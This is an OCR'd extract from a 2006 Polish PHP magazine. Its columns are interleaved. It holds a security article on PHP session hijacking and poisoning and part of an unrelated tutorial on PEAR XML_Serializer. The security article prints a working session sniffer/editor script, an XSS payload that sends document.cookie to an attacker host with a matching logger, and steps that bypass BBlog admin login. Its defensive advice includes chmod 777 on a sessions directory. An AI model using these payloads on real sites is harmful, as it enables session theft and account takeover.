zmienną sesyjną o nazwie $variable,
Co należy wiedzieć...
Potrzebna będzie znajomość podstaw
PHP.
Co obiecujemy...
Nauczysz się wykradania sesji PHP po-
przez luki XSS, ich bezpośredniego mo-
dyfikowania na serwerze, ich sniffowania
przy restrykcjach serwera oraz zabezpie-
czania się przed ich wykradaniem i zatru-
waniem.

72 www.phpsolmag.org PHP Solutions Nr 3/2006


a następnie prześlemy do skryptu
zmienną o takiej samej nazwie przy uży-
ciu metody POST lub GET, skrypt bę-
dzie używał wartości zapisanej w zmien-
nej sesyjnej.
Zmienne sesyjne zapewniają nam
tak naprawdę znikomy stopień bezpie-
czeństwa, gdy nasz skrypt używają-
cy sesji znajdzie się na publicznie do-
stępnym serwerze. Nie tylko, że może-
my je modyfikować, kasowac i nadpisy-
wać; możemy również przechwycić se-
sję innego użytkownika i w efekcie być
zalogowanym (np. na forum lub blogu)
jako on.
Fizyczna lokalizacja
zmiennych sesyjnych
W przypadku zmiennych POST, GET
i COOKIES, nie mamy najmniejszych
wątpliwości co do ich fizycznej lokali-
zacji. Zarówno zmienne z tablic $_POST
jak i $_GET są jednokrotnie przesyłane
do skryptu i nie są nigdzie na stałe za-
pamiętywane. Zmienne z tabeli $_COOKIE
są przetrzymywane na dysku użytkowni-
ka w postaci plików ciasteczek zgroma-
dzonych w odpowiednim dla danej prze-
glądarki miejscu. Natomiast zmienne se-
syjne nie są ani przesyłane jednokrot-
nie, bo przeczyłoby to ich przeznacze-
niu. Nie są też przechowywane po stro-
nie użytkownika, gdyż narażałoby je to
na modyfikacje, lecz w postaci plików
na serwerze (który musi mieć do nich
dostęp przez cały czas istnienia sesji).
W systemach uniksowych są to pliki
o nazwach sess_$ID ulokowane w kata-
logu /tmp, gdzie $ID oznacza przypisany
do danego użytkownika numer sesji.
Struktura takiego pliku wygląda nastę-
pująco:
nazwa zmiennej|typ:[długość:]wartość;
A oto przykładowy plik sesji:
zalogowany|i:1;login|s:6:
"unknow";haslo|s:5:"tajne"
Zapis login|s:6:"unknow" oznacza,
że w sesji zdefiniowana jest zmienna
$login typu tekstowego (s = string) o
długości sześciu znaków oraz wartości
unknow. Poszczególne zmienne w pliku
sesji oddzielone są od siebie znakiem
średnika. Dla danych liczbowych nie
PHP Solutions Nr 3/2006
zatruwanie sesji w PHP Bezpieczeństwo
ustalamy długości zmiennej i używamy Jak się przed tym obronić? Nale-
typu integer (litera i), tak jak w przy- ży włączyć opcję PHP-ową Safe Mode,
padku zmiennej $zalogowany (zalogowa- co ma miejsce na znacznej większości
ny|i:1;), która ma wartość 1. serwerów hostingowych. Uniemożliwi
to przeglądanie plików innych użytkow-
Modyfikacja sesji ników, również tych znajdujących się w
poprzez pliki katalogu /tmp. Użycie funkcji readdir()
Naszym celem będzie nielegalna mo- w tym trybie również nie będzie wyko-
dyfikacja pliku sesji w katalogu /tmp/ na nalne.
dysku serwera. Zadanie to jest znacz-
nie ułatwione tym, że pliki sesji tworzo- Zatruwanie sesji metodą
ne są przez serwer Apache, a więc ich unknowa & adama_i
właścicielem jest zazwyczaj użytkownik Prawie pół roku temu na bugtraq serwi-
nobody. Z tego właśnie powodu mamy su securityfocus.com pojawił się raport
prawo odczytu i zapisu plików sesji z po- o błędzie, na który podatne są wszyst-
ziomu dowolnego skryptu PHP, którego kie dotychczasowe wersje PHP. Ra-
może używać również włamywacz. port ten znajduje się pod adresem http://
Listing 1. Sniffer zmiennych sesyjnych
<?php
if ($sess_number) {setcookie('PHPSESSID',$sess_number);
$_COOKIE['PHPSESSID']=$sess_number;}
session_start();
?>
<h1>SniffEdSess</h1>
sniffer&edytor zmienych sesyjnych<br><br>
<form method=post>
<table cellpadding=5 cellspacing=0 border=1>
<tr bgcolor="silver">
<th>numer sesji:</th>
</tr>
<tr>
<td><input type="text" name="sess_number"></td>
</tr>
<tr bgcolor="silver">
<td><input type="submit" value="ok"></td>
</tr>
</table>
</form><br>
<table cellpadding=5 cellspacing=0 border=1>
<tr bgcolor="silver"><th>Przechwycone dane</th></tr>
<tr><td><?var_export($_SESSION);?></td></tr>
</table><br>
<form method=post>
<table cellpadding=5 cellspacing=0 border=1>
<tr bgcolor="silver"><th>Zmienna:</th></tr>
<tr><td><input type="text" name="variable"></td></tr>
<tr bgcolor="silver"><th>Wartosc:</th></tr>
<tr><td><input type="text" name="var_value"></td></tr>
<tr bgcolor="silver"><td><input type="submit" value="Zmień"></td></tr>
</table>
</form>
<?
if (isset($variable)){
echo('<br><font color="green">Ustawiono $variable na wartość
'.$var_value.'</font><br><br>');
$_SESSION["$variable"]=$var_value;
}
echo('<br>Copyright &copy by Unknow - unknow@uw-team.org');
?>
www.phpsolmag.org 73
Bezpieczeństwo zatruwanie sesji w PHP
www.securityfocus.com/archive/1/410895/
30/0/threaded.
Na czym polega wymienione zagro-
żenie? W chwili, gdy użytkownik urucha-
mia dowolny skrypt PHP wykorzystują-
cy system sesji, zostaje mu przypisane
SessionID – unikalny numer identyfikują-
cy tę sesję. Co się stanie, jeśli uruchomi-
my dwa różne skrypty używające systemu
sesji? Zostanie nam przydzielony unikalny
numer sesji, lecz... okazuje się, że będzie
on w obu przypadkach taki sam! Błąd ten
występuje nawet wtedy, gdy uruchomimy
dwa skrypty z sesjami na różnych kontach
użytkowników. Oznacza to, że przykłado-
wy skrypt pod adresem:
http://www.jakisadres.pl/~konto/skrypt.php
wygeneruje nam ten sam numer sesji, co
aplikacja znajdująca się pod:
http://www.jakisadres.pl/~innekonto/
skrypt.php.
Jest to niezwykle istotna luka w bezpie-
czeństwie stanowiąca furtkę dla agresora,
gdyż wszystkie zmienne tworzone przez
pierwszy skrypt mogą być nadpisywane
przez drugi – wystarczy, że pokrywają się
ich nazwy.
Sniffing sesji,
czyli namierzanie
zmiennych sesyjnych
Sniffing to obserwowanie ruchu w sieci
komputerowej w celu przejęcia przesyła-
nych danych, w szczególności loginów i ha-
seł. Natomiast sniffing sesji odnosi się do
przechwytywania i ewentualnego modyfiko-
wania zmiennych sesyjnych. Na Listingu 1
przedstawiamy kod prostego sniffera sesji,
który będzie wykonywał obie te czynności.
Jego działanie jest następujące:
sprawdzamy, czy użytkownik wpisał prze-
chwycony przez siebie numer sesji. Je-
żeli tak, to tworzymy ciasteczko PHP-
SESSID, do którego go przypiszemy. Na-
stępnie, niezależnie od wyniku tej opera-
cji, uruchamiamy nową sesję na serwerze
(session_start). Jak wiemy, jeśli przed
wywołaniem tej instrukcji istniała jakaś
sesja, to nowo zakładanej sesji zosta-
nie przypisany jej numer. Jeśli więc dwa
skrypty wywołały tworzenie sesji na jed-
nym serwerze, to oba będą używały te-
go samego identyfikatora sesji, w konse-
kwencji operując na wspólnym pliku i udo-
stępniając sobie nawzajem zmienne.
74
Następnie utworzymy formularz umożli- fer działa jedynie w obrębie serwera, na któ-
wiający użytkownikowi wpisanie wspomnia- rym został uruchomiony i tylko pod warun-
nego już przechwyconego numeru sesji, kiem, że wszystkie sesje zapisywane są w
który zostanie przesłany metodą POST. Po- tym samym katalogu. Sprawia to, że użyt-
tem w tabeli wyświetlimy zawartość tablicy kownicy serwerów dedykowanych oraz
$_SESSION, czyli przechwycone zmienne se- wszelkich kont niepublicznych mogą się
syjne i utworzymy kolejny formularz, pozwa- czuć bezpiecznie. W przypadku serwerów
lający na wpisanie nowej wartości zmien- wirtualnych, każde konto ma przeważnie
nej $variable (w polu var_value). Na ko- swój własny katalog /tmp, w którym prze-
niec będziemy sprawdzać, czy zmienna chowywane są sesje, natomiast na serwe-
$variable istnieje: jeżeli tak, to przypiszemy rach niepublicznych nie można umieścić ko-
jej nową wartość, wysłaną przez użytkowni- du sniffera.
ka w formularzu i pobraną z pola var_value
($var_value). Komu zagraża sniffer sesji?
Jak widzimy, sniffer nie operuje na pli- Jak już wspomniałem, podatne są jedynie
kach. Odczytuje on jedynie zawartość tabli- serwery, na których istnieje możliwość swo-
cy zmiennych sesyjnych, co znaczy, że bę- bodnego założenia konta, a dane tymczaso-
dzie on działał także przy włączonej opcji we (katalog /tmp) są współdzielone. Ozna-
Safe Mode. Należy jednak pamiętać, że snif- cza to, że choć serwery największych firm
Jak zdobyć numer sesji użytkownika?
Istnieje wiele metod zdobycia numeru sesji. Przedstawimy te najpopularniejsze, pomi-
jając wszelkiego rodzaju socjotechnikę (czyli manipulowanie zachowaniem użytkowni-
ków).
Najprostszym sposobem przechwycenia potrzebnych agresorowi danych jest użycie
błędów typu XSS (zostały one opisane w poprzednim numerze PHP Solutions, w artykule
Niebezpieczeństwa ataków XSS i CSRF). Przyjmujemy, że większość czytelników wie, na
czym polegają tego typu błędy.
Załóżmy, że mamy księgę gości, w którą możemy wpisać dowolny kod HTML.
Wpiszmy zatem do niej następujący kod, którego zadaniem będzie pobieranie ciaste-
czek:
<script language="JavaScript">
self.location.href="
http://www.intruder.pl/loguj.php?id=
"+escape(document.cookie);
</script>
Następnie pod adresem podanym w skrypcie musimy umieścić plik loguj.php o następują-
cej zawartości:
<?php
if (isset($id)){
$plik=fopen('dane.txt','a');
fputs($plik,"$id\n");
fclose($plik); }
echo('Error 404 – nie ma takiej strony');
?>
Gdy już wszystko przygotujemy, każda osoba wchodząca na księgę gości z umieszczo-
nym przez agresora kodem będzie automatycznie przekierowywana na stronę z fałszy-
wym błędem 404, a jej ciasteczka zostaną zapisane w pliku.
Agresor musi jedynie odczytać ten plik w chwili, gdy ofiara jest jeszcze zalogowana,
lub gdy sesja jeszcze nie wygasła. Gdy zdobędzie on numer sesji w takim właśnie mo-
mencie, wystarczy, że w drugim oknie uruchomi sniffera sesji prezentowanego na począt-
ku artykułu i zmieni numer swojej sesji na właśnie zdobyty.
Naturalnie, prezentowany sposób wstrzykiwania kodu JavaScript w kod strony jest tyl-
ko przykładem. Równie dobrze możemy go wstawić jako parametr w adresie strony, o ile
parametr ten jest później wyświetlany na stronie bez filtrowania tagów.
Niezwykłą ciekawostką jest fakt, że w chwili, gdy zaczniemy zatruwać przypisaną nam
sesję z numerem ofiary, wszystkie odczuwalne przez nas zmiany będą również odczuwal-
ne dla ofiary. Oznacza to, że jeśli agresor przypisze sobie numer sesji zdobyty poprzez
skrypt logujący, a następnie zmieni sobie poziom użytkownika np. na administratora, to
użytkownik, którego numer sesji został skradziony, również natychmiastowo otrzyma pra-
wa administratora, ponieważ obie osoby korzystają z tego samego pliku przetrzymujące-
go dane sesji.
www.phpsolmag.org PHP Solutions Nr 3/2006

hostingowych wydają się bezpieczne, to
jednak testy, które przeprowadziłem na ta-
nich dostawcach usług hostingowych po-
twierdzają, że ich znaczna część jest podat-
na na tego typu ataki. Ponadto moi znajo-
mi przeprowadzili szereg testów na krakow-
skich serwerach uczelnianych, które oferują
swoim studentom miejsce na strony domo-
we. Dokładnie 100% przeprowadzonych te-
stów zakończyło się w tym przypadku suk-
cesem, czyli każdy z badanych systemów
okazał się podatny na atak. Jeśli więc jesteś
posiadaczem konta studenckiego na serwe-
rze hostingowym swojej uczelni, lub kupiłeś
płatne konto za przysłowiowe 3 zł miesięcz-
nie, to możesz być pewien, że twoje dane
nie są w pełni bezpieczne.
Przykład użycia sniffera sesji
Tym razem posłużymy się istniejącym i nie-
zwykle popularnym skryptem, jakim jest
BBlog. Jest to system przeznaczony do
prowadzenia internetowego pamiętnika
(bloga). Jest stosunkowo prosty w budo-
wie i zarazem bardzo bezpieczny (od daw-
na nie stwierdzono w nim podatności na
SQL Injection i ataki innego typu). Mimo to,
cały jego system uwierzytelniania użytkow-
nika opiera się na zaledwie jednej zmien-
nej sesyjnej. Jak widać, autorzy tego opro-
gramowania zaufali powszechnej opinii, ja-
koby modyfikacja zmiennych sesyjnych by-
ła niemożliwa.
W tym przypadku nie będziemy zatru-
wali sesji innych użytkowników w celu prze-
jęcia ich kont, lecz zatrujemy swoją własną
sesję, aby stać się pełnoprawnym użytkow-
nikiem bloga. Nasz eksperyment zaczyna-
my od instalacji BBLoga na swoim koncie,
np. pod adresem:
http://www.naszhost.pl/~naszekonto/
pamietnik/
Jednocześnie pod adresem:
http://www.naszhost.pl/~naszekonto/
sniffer.php
Umieszczamy kod z Listingu 1. Teraz
wchodzimy do panelu administracyjnego
założonego przez nas bloga:
http://www.naszhost.pl/~naszekonto/
pamietnik/bblog/
W drugim oknie przeglądarki otwieramy snif-
fer sesji. Na razie okno przechwyconych
zmiennych będzie puste. Logujemy się do
PHP Solutions Nr 3/2006
zatruwanie sesji w PHP
bloga korzystając ze znanych nam danych
(podanych podczas instalacji), a jednocze-
śnie odświeżamy zawartość okna ze sniffe-
rem. W oknie sniffera powinniśmy zobaczyć
następujące dane:
Przechwycone dane:
array ( 'user_id' => '1', )
Jak widzimy, jedyną zmienną zmodyfiko-
waną podczas logowania jest $user_id.
Została jej przypisana wartość 1, co w tym
przypadku oznacza administratora (pamię-
tajmy, choć że podstawowa wersja BBloga
jest przeznaczona dla jednego użytkowni-
ka, to z wersji rozszerzonej może korzy-
stać więcej użytkowników).
Do ataku!
Wiemy już, jaką zmienną musi edytować
agresor, aby zalogować się do panelu admi-
nistracyjnego. Kolejnym etapem ataku jest
założenie konta na tym samym serwisie ho-
stingowym, na którym znajduje się blog, na
którym chcemy uzyskać większe przywileje.
Jeśli więc wybierzemy skrypt:
http://www.dowolnyadres.pl/~konto/
To adresem konta osoby testującej oma-
wiany błąd będzie np.:
http://www.dowolnyadres.pl/~tester/
Teraz zamieścimy skrypt sniffer.php na
swoim koncie (np. za pomocą FTP) i wej-
dziemy do panelu administracyjnego blo-
ga, otwierając jednocześnie sniffera w dru-
gim oknie. Gdy naszym oczom ukaże się
formularz pytający o login i hasło do bloga,
przełączymy się do naszego skryptu i wpi-
szemy do niego dane według schematu:
zmienna: user_id
wartość: 1
Następnie zatwierdzamy zmiany i czekamy
na komunikat o nadpisaniu zmiennych. Po-
tem powracamy do panelu logowania i od-
świeżamy stronę (klawiszem [F5] lub [CTR-
L]+[R]). Tym razem okno z loginem i hasłem
nie powinno się pojawić – zamiast tego, po-
winniśmy się znaleźć w panelu administra-
cyjnym. Tak oto zalogowaliśmy się bez uży-
cia hasła modyfikując jedynie (teoretycznie
niemodyfikowalną) zmienną sesyjną.
Jak się zabezpieczyć?
Istnieje kilka metod takiego pisania skryp-
tów, aby nie były one podatne na ten błąd.
www.phpsolmag.org
Bezpieczeństwo
Rysunek 1. Działanie sniffera sesji
W pełni skuteczną metodą jest jednak wy-
łącznie zmiana folderu przechowywania
sesji. Zrobimy to dopisując na początku
swojego skryptu następującą linijkę:
session_save_path('sesje/');
Pamiętajmy, aby podkatalog sesje/ istniał
i miał ustawione pełne prawa dostępu (chmod
777). Metoda ta stanowi w pełni wystarczają-
ce zabezpieczenie zarówno przed ręczną
modyfikacją pliku z sesjami (agresor nie bę-
dzie wiedział, gdzie przechowywane są se-
sje), jak i przed drugą z opisywanych metod.
Podsumowanie
Na podstawie przedstawionych przez
nas technik przechwytywania i modyfi-
kacji zmiennych sesyjnych widać, że nie
można w pełni ufać rzekomo oferowane-
mu przez sesje bezpieczeństwu. Zamiast
tego, należy dołożyć wszelkich starań w
celu uniemożliwienia wystąpienia tych
oraz wielu innych błędów (np. XSS czy
HTML Injection). Obrona przed obiema
metodami przechwytywania sesji zajmu-
je jedną linijkę kodu zmieniającą położe-
nie folderu sesji: pokazuje to, jak niewie-
le trzeba, aby być bezpiecznym. n
O autorze:
Jakub Mrugalski pracuje jako programi-
sta i administrator w jednej z krakowskich
agencji reklamowych, a zarazem jest stu-
dentem zaocznym informatyki. W wolnym
czasie zajmuje się prowadzeniem serwi-
su internetowego uw-team.org oraz pro-
wadzeniem własnych projektów programi-
stycznych.
Kontakt z autorem: unknow@uw-team.org
75
PEAR

Generowanie kodu XML

z pakietem XML_Serializer
Stopień trudności: lll
Aaron Wormus

Przedstawiamy kolejny bardzo przydatny

pakiet PEAR'owy, tym razem związany z XML.
W artykule pokażemy zastosowanie XML-owego
niezbędnika PHP, czyli pakietu XML_Serializer,
pozwalającego szybko i w łatwy sposób
generować dokumenty XML.

W SIECI
1. http://pear.php.net/package/
XML_Serializer
– strona główna pakietu
XML_Serializer
2. http://xulplanet.com
– XULPlanet, ciekawa witry-
na o języku XUL
3. http://imdb.com
– IMDB, czyli Internet Movie
Data Base
O
d czasu stworzenia standardu
XML pod koniec lat 90., po-
wszechne podejście do tego
języka uległo poważnym zmianom. Spe-
cyfikację XML pierwotnie opracowała gru-
pa robocza W3C złożona z przedstawicieli
wielu znanych korporacji informatycznych,
więc w marketingowej gorączce związanej
w utworzeniem nowego, rozszerzalnego
języka znaczników obsługa XML-a była
dodawana do wielu programów tylko po
to, by dołożyć najnowszy chwytliwy skrót
do opisu produktu.
Z biegiem lat gorączka ostygła i za-
częto używać XML-a do celów, do któ-
rych został stworzony. Obecnie można po-
wiedzieć, że XML zadomowił się na do-
bre w informatyce, a w dodatku znajdu-
je zastosowanie w miejscach, o których
się autorom pierwotnej specyfikacji na-
wet nie śniło. Formaty XML-owe spotyka-
my na każdym kroku, od protokołów Web
Services poprzez eksport danych z apli-
kacji po standard Internet Content Syndi-
cation, a wraz z popularyzacją technolo-
gii AJAX XML coraz częściej pojawiają się
również na zwykłych stronach interneto-
wych. W obliczu wszechobecności XML-a
we współczesnej informatyce, umiejętność
tworzenia i parsowania kodu XML stała się
koniecznością dla każdego programisty.
Oczywiście XML znalazł również dro-
gę do świata PHP, gdzie zadomowił się na
dobre w różnorodnych zastosowaniach:
formatowaniu dokumentów, składowaniu
danych, protokołach SOAP i XML-RPC
i wielu innych.
Co należy wiedzieć...
Powinieneś się dobrze orientować
w tematyce XML.
Co obiecujemy...
Pokażemy jak generować różnego
rodzaju dokumenty XML z pomocą
pakietu XML_Serializer

76 www.phpsolmag.org PHP Solutions Nr 3/2006


Słowo o XML-u
Zanim zajmiemy się samym pakietem
XML_Serializer, nie zawadzi pokrótce
przyjrzeć się formatowi i strukturze doku-
mentów XML.
Twórcy specyfikacji XML wzorowa-
li się na standardzie języka znaczników
SGML (ang. Standard General Markup
Language), opracowanym jeszcze w la-
tach 80. jako format tekstowy nadają-
cy się do przetwarzania przez kompu-
ter. Ze względu na wysoki stopień ogól-
ności SGML był jednak językiem bar-
dzo skomplikowanym, stąd też potrze-
ba opracowania prostszej jego wersji,
nadającej się do wykorzystania w Inter-
necie i niewymagającej pełnego parse-
ra SGML do przetwarzania dokumentów.
XML jest więc podzbiorem języka SGML
i opiera się na podobnych do niego za-
łożeniach, ale z uwzględnieniem dodat-
kowych ograniczeń mających na celu
uproszczenie procesu parsowania.
Listing 1 przedstawia przykłado-
wy kod prostego dokumentu XML opi-
sującego moje ulubione filmy. XML wy-
gląda znajomo dla każdego, kto zna
HTML. Nieprzypadkowo – oba języ-
ki są podzbiorami ogólniejszego forma-
tu SGML. Dokument zaczyna się od de-
klaracji XML, określającej wersję forma-
tu XML oraz metodę kodowania tekstu.
W przypadku dokumentów w Unikodzie,
Listing 1. Lista ulubionych filmów
w prostym dokumencie XML
<?xml version="1.0"?>
<movies>
<movie>Piąty Element</movie>
<movie>High Fidelity</movie>
</movies>
Listing 2. Lista ulubionych filmów
z nieco bardziej szczegółowymi
informacjami
<movies>
<movie name="Piąty Element">
<writer>Luc Besson</writer>
<year>1997</year>
<imdb>tt0119116</imdb>
</movie>
<movie name="High Fidelity">
<writer>Nick Hornby</writer>
<year>2000</year>
<imdb>tt0146882</imdb>
</movie>
</movies>
PHP Solutions Nr 3/2006
XML_Serializer PEAR
w deklaracji XML należy umieścić atrybut Pakiet XML_Serializer nosi oznacze-
encoding = "utf-8". nie beta, jednak nie wynika ono z jako-
Ciało dokumentu XML stanowi je- ści kodu, a jedynie sygnalizuje możli-
den znacznik nadrzędny, zawierają- wość przyszłych zmian w API. Zgodnie
cy całą resztę dokumentu. W przykła- ze standardami PEAR, oznaczenie pa-
dzie z Listingu 1 znacznikiem nadrzęd- kietu jako stabilnego (stable) jest równo-
nym jest <movies>, w którym znajduje znacznie zamrożeniu API w celu utrzy-
się wiele znaczników <movie>. Na ra- mania kompatybilności. Z tego też wzglę-
zie dokument nie zawiera zbyt dużo in- du twórcy intensywnie rozwijanych pakie-
formacji, może poza tym, że lubię filmy tów utrzymują je w stanie beta do czasu
z dobrą ścieżką dźwiękową. Listing 2 osiągnięcia przez API dojrzałości gwa-
przedstawia ten sam dokument roz- rantującej brak poważniejszych zmian
budowany o dodatkowe znaczniki za- w przyszłości.
gnieżdżone i atrybuty.
Specyfikacja XML znacznie oczywi- Praca z pakietem
ście wykracza poza te proste przykłady, XML_Serializer
ale dla potrzeb tego artykułu więcej infor- Zanim zagłębimy się w mechanizmy
macji o samym XML-u nie będziemy po- funkcjonowania pakietu XML_Seriali-
trzebować. zer, przyjrzyjmy się kodowi pokazujące-
mu, jak łatwo generować kod XML z po-
Instalacja pakietu mocą tego narzędzia (Listing 3). Zaczy-
XML_Serializer namy od dołączenia pliku zawierającego
XML_Serializer jest zależny od kilku in- kod klasy XML_Serializer, po czym two-
nych pakietów PEAR, więc instalacja rzymy tablicę zawierającą dane oraz ta-
wymaga wykonania następującego po- blicę zawierającą opcje, na podstawie
lecenia: pear install --alldeps xml_ których XML_Serializer będzie genero-
serializer-beta. Spowoduje to zainstalo- wać kod XML.
wanie pakietów: XML_Serializer, XML_Util Tworząc instancję klasy XML_Serializer
i XML_Parser. przekazujemy konstruktorowi tablicę opcji,
Listing 3. Generowanie kodu XML z pomocą pakietu XML_Serializer
require_once 'XML/Serializer.php';
$movies = array("Piąty Element", "High Fidelity");
$options = array ('rootName' => 'movies','defaultTagName' => 'movie');
$serializer = &new XML_Serializer($options);
$status = $serializer->serialize($movies);
$xml = $serializer->getSerializedData();
header('Content-type: text/xml');
echo $xml;
Listing 4. Generowanie kodu XML w trybie simplexml
$movies = array('movie' => array('Piąty Element', 'High Fidelity'));
$options = array ('rootName' => 'movies', 'mode' => 'simplexml');
Listing 5. Dodawanie atrybutów do znaczników XML za pomocą
tablicy asocjacyjnej
$movies = array(array('attr' => array('name' => 'Piąty Element'),
"writer" => "Luc Besson",
"year" => "1997",
"imdb" => "tt0119116"),
array('attr' => array('name' => 'High Fidelity'),
"writer" => "Nick Hornby",
"year" => "2000",
"imdb" => "tt0146882"));
$options = array ('rootName' => 'movies',
'attributesArray' => "attr",
'defaultTagName' => 'movie');
www.phpsolmag.org 77
PEAR XML_Serializer

Tabela 1. Niektóre opcje pakietu XML_Serializer

Nazwa Opis
indent Ciąg znaków używany do tworzenia wcięć
linebreak Znak nowej linii (domyślnie \n)
addDecl Dodanie deklaracji XML
encoding Kodowanie znaków w dokumencie
defaultTagName Domyślna nazwa używana w przypadku braku jawnie określonego znacznika
scalarAsAttribute Serializacja wszystkich wartości jako atrybutów; może dotyczyć tylko wybranych znaczników
indentAttributes Wyrównanie atrybutów w pionie w obrębie znacznika
addDoctype Dodanie deklaracji XML Doctype
doctype Ciąg znaków lub tablica z deklaracją Doctype
rootName Ciąg znaków z nazwą znacznika głównego
rootAttributes Atrybuty znacznika głównego
attributesArray Klucz wskazujący tablicę atrybutów dla znacznika macierzystego
contentName Klucz wskazujący wartość używaną jako treść znacznika macierzystego; opcja używana z attributesArray
commentName Treść komentarza
tagMap Odwzorowania nazw znaczników
mode Opcja trybu – ustawienie trybu simplexml spowoduje wykorzystanie klucza wartości macierzystej jako nazwy
znacznika
overrideOptions Pozwala opcjom ustawionym za pomocą setOption() lub setOptions() przesłaniać opcje przekazane w konstruktorze

po czym możemy pobrać dane seriali-
zowane do kodu XML wywołując metodę
getSerializedData(). Kod z Listingu 3
zwraca dane XML odpowiadające przy-
Listing 6. Kod XML wygenerowa-
ny z opcją traktowania wszystkich
wartości jako atrybutów
<movies>
<movie imdb="tt0119116"
name="Piąty Element"
writer="Luc Besson"
year="1997" />
<movie imdb="tt0146882"
name="High Fidelity"
writer="Nick Hornby"
year="2000" />
</movies>
Listing 7. XML z dodatkowymi
informacjami o postaciach z filmów
kładowi z Listingu 1. Opcje generowania
XML-a można też zmieniać już po utwo-
rzeniu instancji XML_Serializer za po-
mocą metod setOption() i setOptions().
Jeśli opcje przekazane za pomocą
setOption() mają przesłonić opcje pier-
wotnie przekazane konstruktorowi, na-
leży ustawić parametr overrideOptions
na true.
Przyglądając się kodowi XML z do-
tychczasowych przykładów nietrudno do-
strzec podobieństwo między strukturą
drzewa znaczników XML a strukturą ta-
blicy asocjacyjnej w PHP. XML_Serializer
wykorzystuje to właśnie podobieństwo
– jak widać z przykładu, wystarczy tabli-
ca z danymi i kilka opcji określających
sposób generowania kodu XML.
Zapoznanie się ze wszystkimi do-
stępnymi opcjami jest istotnym elemen-
tem opanowania pakietu XML_Serializer.
Na podstawie tablicy danych można wy-
generować dowolnego rodzaju kod XML
– wystarczy tylko podać odpowiednie
opcje, a niekiedy dodatkowo zmodyfiko-
wać strukturę tablicy, by dokładniej odpo-
wiadała strukturze pożądanego dokumen-
tu XML. Tabela 1 przedstawia najważniej-
sze opcje, z których wiele poznamy na
kolejnych przykładach. Dostępne są też
inne opcje, ale dla potrzeb tego artykułu
ich znajomość nie jest konieczna.
Tryby działania
W pierwszym przykładzie wykorzy-
staliśmy prostą tablicę jednowymiaro-

<movies>
<movie name='Piąty Element'>
<writer>Luc Besson</writer>
<year>1997</year>
<imdb>tt0119116</imdb>
<character name='Leeloo'>
<actor>Milla Jovovich</actor>
<imdb>nm0000170</imdb>
</character>
<character name='Korben Dallas'>
<actor>Bruce Willis</actor>
<imdb>nm0000246</imdb>
</character>
</movie>
<!-- ... -->
</movies>

Rysunek 1. Interfejs dla skryptu pobierającego dane o filmach z bazy IMDB

78 www.phpsolmag.org PHP Solutions Nr 3/2006


wą, a nazwy znaczników XML wska-
zaliśmy za pomocą opcji rootName
i defaultTagName. XML_Serializer po-
zwala też osiągnąć ten sam efekt w inny
sposób, co w naszym prostym przykła-
dzie nie jest może konieczne, ale bar-
dzo się przydaje w przypadku bardziej
złożonych dokumentów XML.
Za pomocą opcji mode możemy usta-
wić tryb działania simplexml, w którym z
każdą wartością tablicy kojarzona jest
nazwa klucza tablicy nadrzędnej, odpo-
wiadająca nazwie znacznika. W trybie
domyślnym można podać tylko jedną
wartość defaultTagName, podczas gdy
tryb simplexml pozwala jawnie określać
nazwy znaczników na poszczególnych
poziomach, co daje znacznie większą
kontrolę nad strukturą dokumentu XML.
Kod z Listingu 4 generuje identyczny
XML, jak przykład wcześniejszy, ale tym
razem korzystając z trybu simplexml.
Decyzja o wyborze trybu w dużym
stopniu zależy od rodzaju generowa-
nego kodu XML. Tryb domyślny jest ła-
twy w obsłudze i w wielu przypadkach
sprawdza się zupełnie dobrze, jednak
w przypadku bardziej złożonych doku-
mentów jedyną możliwością jest tryb
simplexml. Pewną wadą pracy w trybie
simplexml jest konieczność tworzenia
znacznie bardziej rozbudowanych ta-
blic danych.
Dodawanie atrybutów
Dotychczasowe przykłady generowały
bardzo prosty kod XML, więc w kolejnym
przykładzie pora wprowadzić atrybuty.
R E
PHP Solutions Nr 3/2006
XML_Serializer udostępnia kilka
metod pracy z atrybutami. Pierw-
szym sposobem jest wykorzysta-
nie opcji attributesArray, pozwalają-
cej na przekazanie klucza definiujące-
go tablicę zawierającą nazwy i warto-
ści atrybutów, które mają być dodane
do znacznika macierzystego. W kodzie
z Listingu 5 klucz ten nosi nazwę attr.
Wskazanie tak przygotowanej tablicy
w opcjach przekazywanych obiekto-
wi klasy XML_Serializer daje w wyniku
kod XML z Listingu 2.
Dość często trafia się kod XML,
w którym wszystkie wartości są składo-
wane jako atrybuty, czyli nie ma żadnych
wartości w obrębie samych znaczników.
Jeśli tak faktycznie jest, to można usta-
wić opcję scalarAsAttributes na true,
co spowoduje traktowanie wszystkich
wartości kluczy w ramach danego znacz-
nika jako atrybutów. Listing 6 pokazuje
kod XML wygenerowany z tych samych
danych po podaniu tej opcji.
Znaczniki zagnieżdżone
Mamy już całkiem porządną struktu-
rę dokumentu XML do składowania in-
formacji o ulubionych filmach, ale przy-
dałoby się ją jeszcze nieco rozbudować
o informacje na temat głównych posta-
ci filmu. Wymaga to dodania dla każdej
postaci zestawu znaczników ją opisują-
cych – Listing 7 przedstawia przykłado-
wy kod XML.
W tym momencie pojawia się pro-
blem: nie da się takiego dokumentu zapi-
sać w postaci tablicy PHP, gdyż nie mo-
K L A M
www.phpsolmag.org
XML_Serializer PEAR
żemy w tej samej tablicy umieścić dwóch
kluczy o takiej samej nazwie character.
Moglibyśmy nie używać klucza, ale wte-
dy XML_Serializer użyłby klucza domyśl-
nego, któremu wcześniej przypisaliśmy
wartość movie – a zupełnie nie o to nam
chodzi.
Rozwiązanie problemu wymaga
przejścia we wspomniany wcześniej tryb
simplexml i modyfikacji struktury tabli-
cy. Dla zwiększenia czytelności podzieli-
łem jedną rozbudowaną tablicę na dwie
mniejsze. W rzeczywistości dane bę-
dą najczęściej pobierane z zewnętrzne-
go źródła (na przykład bazy danych lub
usługi sieciowej), więc nie ma potrzeby
operowania na dużych i niewygodnych
tablicach zagnieżdżonych. Dla potrzeb
naszego przykładu tablice dobrze jednak
ilustrują proces generowania kodu wy-
nikowego – Listing 8 pokazuje definicje
odpowiednich tablic.
Rzeczywisty przykład
Na tym etapie wiemy już, na czym pole-
ga generowanie kodu XML za pomocą
pakietu XML_Serializer, pora więc wyko-
rzystać tę wiedzę w praktyce i wygenero-
wać coś, co mogłoby się przydać w rze-
czywistych zastosowaniach. W tym ce-
lu wygenerujemy plik w formacie XUL
– schemacie XML używanym do defi-
niowania struktury interfejsu użytkowni-
ka w przeglądarkach z rodziny Mozilla.
Wykorzystamy tablicę danych z ostat-
niego przykładu, po czym podając od-
powiednie opcje przetworzymy ją do po-
staci poprawnego dokumentu XUL, któ-
A
79
PEAR XML_Serializer

